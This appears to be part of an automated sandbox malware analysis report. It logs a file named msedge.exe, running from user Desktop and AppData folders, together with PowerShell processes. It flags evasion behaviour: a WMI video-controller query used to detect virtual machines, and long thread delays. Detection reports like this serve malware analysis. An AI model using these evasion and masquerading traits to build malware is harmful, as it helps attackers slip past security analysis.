                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\msedge.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\msedge.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeMemory allocated: 1A8D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\msedge.exeMemory allocated: AA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exeMemory allocated: 1A6A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exeMemory allocated: 23B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exeMemory allocated: 1A570000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exeMemory allocated: 2B70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exeMemory allocated: 1AE00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exeMemory allocated: 2DE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\msedge.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599655Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599435Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599251Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 599008Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\msedge.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\msedge.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\msedge.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\msedge.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\msedge.exeWindow / User API: threadDelayed 3339Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeWindow / User API: threadDelayed 6505Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5035Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4806Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5444Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4121Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7577Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1931Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7600
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1987
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exe TID: 6896Thread sleep time: -600000s >= -30000sJump to behavior
